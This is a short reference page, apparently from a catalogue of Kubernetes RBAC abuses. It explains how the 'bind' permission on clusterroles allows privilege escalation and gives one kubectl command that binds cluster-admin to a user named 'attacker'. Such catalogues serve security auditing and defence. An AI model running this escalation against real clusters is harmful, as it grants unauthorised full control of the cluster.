can-i gtfo?

Kubernetes RBAC Abuse Collection

View on GitHub

bind clusterroles

Verb: bind

Resource: clusterroles

Description: Bind cluster roles to users, groups, or service accounts

Abuses

Privilege Escalation

Bind privileged cluster roles to controlled accounts for cluster-wide privilege escalation

# Bind cluster-admin to controlled user
kubectl create clusterrolebinding cluster-admin-escalation --clusterrole=cluster-admin --user=attacker
← Back to overview